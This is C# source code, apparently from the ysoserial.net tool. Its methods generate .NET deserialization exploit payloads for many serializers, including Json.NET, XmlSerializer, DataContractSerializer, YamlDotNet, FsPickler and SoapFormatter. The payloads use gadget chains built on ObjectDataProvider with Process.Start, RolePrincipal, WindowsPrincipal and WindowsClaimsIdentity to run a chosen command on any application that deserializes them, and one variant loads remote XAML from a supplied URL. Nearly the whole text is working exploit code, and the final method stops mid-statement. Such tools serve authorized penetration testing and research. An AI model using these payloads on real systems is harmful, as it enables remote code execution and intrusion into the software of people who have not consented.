public override object Generate(string formatter, InputArgs inputArgs) { // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml if (formatter.ToLower().Equals("xaml")) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = inputArgs.CmdFileName; if (inputArgs.HasArguments) { psi.Arguments = inputArgs.CmdArguments; } StringDictionary dict = new StringDictionary(); psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict); Process p = new Process(); p.StartInfo = psi; ObjectDataProvider odp = new ObjectDataProvider(); odp.MethodName = "Start"; odp.IsInitialLoadEnabled = false; odp.ObjectInstance = p; string payload = ""; if (variant_number == 2) { ResourceDictionary myResourceDictionary = new ResourceDictionary(); myResourceDictionary.Add("", odp); // XAML serializer can also be exploited! payload = SerializersHelper.Xaml_serialize(myResourceDictionary); } else if (variant_number == 3) { if (xaml_url == "") { Console.WriteLine("Url parameter was not provided."); Console.WriteLine("Try 'ysoserial --fullhelp' for more information."); System.Environment.Exit(-1); } // There are loads of other objects in Presentation that use XAML URLs and they can be used here instead payload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" Source=""" + xaml_url + @"""/>"; } else if (variant_number == 4) { inputArgs.IsSTAThread = true; // we need STAThreadAttribute here string bridge = SerializersHelper.Xaml_serialize(odp); if (inputArgs.Minify) { // using discardable regex array to make it shorter! bridge = XMLMinifier.Minify(bridge, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " }); } // There are loads of other objects in Presentation that use ResourceDictionary and they can all be used here instead payload = @"<WorkflowDesigner xmlns=""clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"" PropertyInspectorFontAndColorData=""" + CommandArgSplitter.XmlStringAttributeEscape(bridge) + @"""/>"; } else { //payload = XamlWriter.Save(odp); payload = SerializersHelper.Xaml_serialize(odp); } if (inputArgs.Minify) { // using discardable regex array to make it shorter! payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " }); } if (inputArgs.Test) { if (inputArgs.IsSTAThread) { var staThread = new System.Threading.Thread(delegate() { try { SerializersHelper.Xaml_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } }); staThread.SetApartmentState(System.Threading.ApartmentState.STA); staThread.Start(); staThread.Join(); } else { try { SerializersHelper.Xaml_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } } return(payload); } if (formatter.ToLower().Equals("json.net")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; string cmdPart = ""; if (inputArgs.HasArguments) { cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':[" + cmdPart + @"] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("fastjson")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @""""; } else { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""""; } String payload = @"{ ""$types"":{ ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"", ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"", ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3"" }, ""$type"":""1"", ""ObjectInstance"":{ ""$type"":""2"", ""StartInfo"":{ ""$type"":""3"", " + cmdPart + @" } }, ""MethodName"":""Start"" }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var instance = JSON.ToObject <Object>(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("javascriptserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'ObjectInstance':{ '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'StartInfo': { '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.JavaScriptSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("xmlserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" > <ExpandedElement/> <ProjectedProperty0> <MethodName>Parse</MethodName> <MethodParameters> <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </MethodParameters> <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProvider> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true); } if (inputArgs.Test) { try { SerializersHelper.XMLSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart, payload; if (variant_number == 2) { if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> "; } else if (variant_number == 3) { payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">xxxxx</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> "; } else { if (inputArgs.HasArguments) { cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType> <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>"; } else { cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>"; } payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:c=""http://www.w3.org/2001/XMLSchema"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" > <ExpandedElement z:Id=""ref1"" > <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Start</a:MethodName> <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> " + cmdPart + @" </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> </root> "; } if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("yamldotnet")) { inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"FileName: " + inputArgs.CmdFileName + @", Arguments: " + inputArgs.CmdArguments; } else { cmdPart = $@"FileName: " + inputArgs.CmdFileName; } String payload = @" !<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> { MethodName: Start, ObjectInstance: !<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { StartInfo: !<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = YamlDocumentMinifier.Minify(payload); } if (inputArgs.Test) { try { SerializersHelper.YamlDotNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("fspickler")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>"; internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload); String payload = @"{ ""FsPickler"": ""4.0.0"", ""type"": ""System.Object"", ""value"": { ""_flags"": ""subtype"", ""subtype"": { ""Case"": ""NamedType"", ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"", ""Assembly"": { ""Name"": ""Microsoft.PowerShell.Editor"", ""Version"": ""3.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""31bf3856ad364e35"" } }, ""instance"": { ""serializationEntries"": [ { ""Name"": ""ForegroundBrush"", ""Type"": { ""Case"": ""NamedType"", ""Name"": ""System.String"", ""Assembly"": { ""Name"": ""mscorlib"", ""Version"": ""4.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""b77a5c561934e089"" } }, ""Value"": """ + internalPayload + @""" } ] } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true); serializer.UnPickleOfString <Object>(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLowerInvariant().Equals("sharpserializerbinary")) { // Binary Serialization Mode object serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Serialize(inputArgs.Cmd); if (inputArgs.Test) { SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Deserialize(serializedData); } return(serializedData); } else if (formatter.ToLowerInvariant().Equals("sharpserializerxml")) { // XML Serialization Mode string serializedData = (string)SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd); if (inputArgs.Test) { SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Deserialize(serializedData); } return(serializedData); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { IGenerator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); var payloadClaimsPrincipalMarshal = new RolePrincipalMarshal(b64encoded); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("SoapFormatter", StringComparison.OrdinalIgnoreCase)) { return(Serialize(payloadClaimsPrincipalMarshal, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = @"{ '$type': 'System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a', 'System.Security.ClaimsPrincipal.Identities': '" + b64encoded + @"' }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new string[] { "System.Web" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = $@"<root type=""System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""> <RolePrincipal xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Web.Security""> <System.Security.ClaimsPrincipal.Identities i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsPrincipal.Identities> </RolePrincipal> </root> "; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { // System.Web needs to be there! ust seems useless here payload = XMLMinifier.Minify(payload, new string[] { "" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string utfString = System.Text.Encoding.UTF8.GetString((byte[])SerializeWithNoTest(payloadClaimsPrincipalMarshal, formatter, inputArgs)); string payload = SerializersHelper.NetDataContractSerializer_Marshal_2_MainType(utfString); if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { // System.Web needs to be there! ust seems useless here payload = XMLMinifier.Minify(payload, new string[] { }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { Generator generator = new TypeConfuseDelegateGenerator(); WindowsIdentity id = WindowsIdentity.GetCurrent(); id.Actor = new ClaimsIdentity(); id.Actor.BootstrapContext = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs); BinaryFormatter bf = new BinaryFormatter(); var ms = new MemoryStream(); bf.Serialize(ms, id); byte[] gadget = ms.ToArray(); string b64encoded = Convert.ToBase64String(gadget); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)) { WindowsPrincipalMarshal obj = new WindowsPrincipalMarshal(); obj.wi = id; return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = @"{ '$type': 'System.Security.Principal.WindowsPrincipal, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'Identity':{ '$type':'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"' } }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = $@"<root type=""System.Security.Principal.WindowsPrincipal, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <WindowsPrincipal xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" > <m_identity> <System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""" xmlns:x=""http://www.w3.org/2001/XMLSchema"" > {b64encoded} </System.Security.ClaimsIdentity.actor> </m_identity> </WindowsPrincipal> </root>"; // this will break the payload, because x is used! todo for @irsdl: fix the xslt in XMLMinifier.cs to have the option to include "unused variables" if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string payload = $@" <WindowsPrincipal z:Type=""System.Security.Principal.WindowsPrincipal"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" > <m_identity z:Type=""System.Security.Principal.WindowsIdentity"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" > <System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"" xmlns=""""> {b64encoded} </System.Security.ClaimsIdentity.actor> </m_identity> </WindowsPrincipal>"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractjsonserializer")) { string payload = "{\"__type\":\"WindowsPrincipal:#System.Security.Principal\",\"m_identity\":{\"System.Security.ClaimsIdentity.actor\":\"" + b64encoded + "\"}}"; // this is unsupported for this formatter if (inputArgs.Minify || inputArgs.UseSimpleType) { } if (inputArgs.Test) { try { SerializersHelper.DataContractJsonSerializer_deserialize(payload, typeof(WindowsPrincipal).AssemblyQualifiedName, null); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = $@" <SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC= ""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:WindowsPrincipal xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Principal""> <m_identity href = ""#ref-2"" /> <m_roles xsi:null=""1"" /> <m_rolesTable xsi:null=""1"" /> <m_rolesLoaded>false</m_rolesLoaded> </a1:WindowsPrincipal> <a1:WindowsIdentity id=""ref-2"" xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Principal""> <System.Security.ClaimsIdentity.actor>{b64encoded}</System.Security.ClaimsIdentity.actor> </a1:WindowsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope>"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, FormatterType.SoapFormatter); } else { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { Generator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase)) { Object obj = null; if (variant_number == 2) { obj = new WindowsClaimsIdentityMarshal_var2(b64encoded); } else if (variant_number == 3) { obj = new WindowsClaimsIdentityMarshal_var3(b64encoded); } else { obj = new WindowsClaimsIdentityMarshal_var1(b64encoded); } return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = ""; if (variant_number == 2) { payload = @"{ '$type': 'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35', 'System.Security.ClaimsIdentity.bootstrapContext': '" + b64encoded + @"' }"; } else { payload = @"{ '$type': 'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35', 'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"' }"; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = ""; if (variant_number == 2) { payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims""> <System.Security.ClaimsIdentity.bootstrapContext i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext> </WindowsClaimsIdentity> </root>"; } else { payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims""> <System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </WindowsClaimsIdentity> </root>"; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if 